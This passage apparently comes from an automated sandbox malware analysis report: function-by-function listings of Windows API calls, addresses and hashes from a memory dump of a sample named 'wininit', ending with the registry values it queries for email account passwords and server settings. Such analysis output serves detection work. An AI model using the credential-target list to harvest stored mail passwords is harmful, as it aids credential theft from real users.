                                                      • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                                      APIs
                                                      • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Open
                                                      • String ID:
                                                      • API String ID: 71445658-0
                                                      • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                                      • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                                      • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                                      • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                                      APIs
                                                      • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID:
                                                      • API String ID: 4033686569-0
                                                      • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                                      • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                                      • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                                      • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                                      APIs
                                                      • LoadLibraryW.KERNEL32(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                                      • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                                      • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                                      • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                                      APIs
                                                      • FreeLibrary.KERNELBASE(?,00000000,E0CF5891,00000000,00000000), ref: 00408B41
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      • Opcode ID: 450bda5b085385e41399d185e0c6d92315b9743f5e19a8ad8642e29fe69941a3
                                                      • Instruction ID: 291ca984118c00001a410e8fe814b9ebecee15bf7cc635df9db1cfcd8d33b31d
                                                      • Opcode Fuzzy Hash: 450bda5b085385e41399d185e0c6d92315b9743f5e19a8ad8642e29fe69941a3
                                                      • Instruction Fuzzy Hash: 0EB092B004820C3EAE002EF19C05C3B3E8DEA4454870044757E0CE5051EA36DE1110A5
                                                      APIs
                                                      • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseFind
                                                      • String ID:
                                                      • API String ID: 1863332320-0
                                                      • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                                      • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                                      • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                                      • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                                      • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                                      • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                                      • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                                      APIs
                                                      • RegCloseKey.KERNEL32(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                                      • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                                      • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                                      • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                                      APIs
                                                      • PathFileExistsW.SHLWAPI(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExistsFilePath
                                                      • String ID:
                                                      • API String ID: 1174141254-0
                                                      • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                                      • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                                      • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                                      • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                                      APIs
                                                      • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: recv
                                                      • String ID:
                                                      • API String ID: 1507349165-0
                                                      • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                      • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                                      • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                      • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                                                      APIs
                                                      • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: closesocket
                                                      • String ID:
                                                      • API String ID: 2781271927-0
                                                      • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                                      • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                                      • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                                      • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                                      APIs
                                                        • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                        • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                        • Part of subcall function 004044A7: GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?,00000000,F66BE5A2,00000000,00000000), ref: 004044CB
                                                      • GetLastError.KERNEL32 ref: 00404585
                                                        • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                                        • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$Process$AllocateErrorFreeLastPrivateProfileString
                                                      • String ID:
                                                      • API String ID: 4065557613-0
                                                      • Opcode ID: 07df6e299c1e51546a6fce8a11171accc3f3248d34e9f20b559e9614b6af16c3
                                                      • Instruction ID: 4921b4961515552709d35feb502e82dc384c9b3b90426e204c6f6ec5e0b55acd
                                                      • Opcode Fuzzy Hash: 07df6e299c1e51546a6fce8a11171accc3f3248d34e9f20b559e9614b6af16c3
                                                      • Instruction Fuzzy Hash: 901157B26011043BEB249EA9AD46F7FB768DF84368F10413FFB05E61D0EA789C00069C
                                                      APIs
                                                      • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeVirtual
                                                      • String ID:
                                                      • API String ID: 1263568516-0
                                                      • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                                      • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                                      • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                                      • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                                      APIs
                                                      • CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID:
                                                      • API String ID: 2962429428-0
                                                      • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                                      • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                                      • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                                      • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                                      APIs
                                                      • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                                      • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                                      • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                                      • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 0040438F
                                                      • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                                      • VariantInit.OLEAUT32(?), ref: 004043C4
                                                      • SysAllocString.OLEAUT32(?), ref: 004043CD
                                                      • VariantInit.OLEAUT32(?), ref: 00404414
                                                      • SysAllocString.OLEAUT32(?), ref: 00404419
                                                      • VariantInit.OLEAUT32(?), ref: 00404431
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitVariant$AllocString$CreateInitializeInstance
                                                      • String ID:
                                                      • API String ID: 1312198159-0
                                                      • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                                      • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                                      • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                                      • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: QueryValue
                                                      • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                                      • API String ID: 3660427363-2111798378
                                                      • Opcode ID: b68ba21e4a3a0049e44e4174c680ab59653fe0191a5276204f50c9857b9783d9
                                                      • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                                      • Opcode Fuzzy Hash: b68ba21e4a3a0049e44e4174c680ab59653fe0191a5276204f50c9857b9783d9
                                                      • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48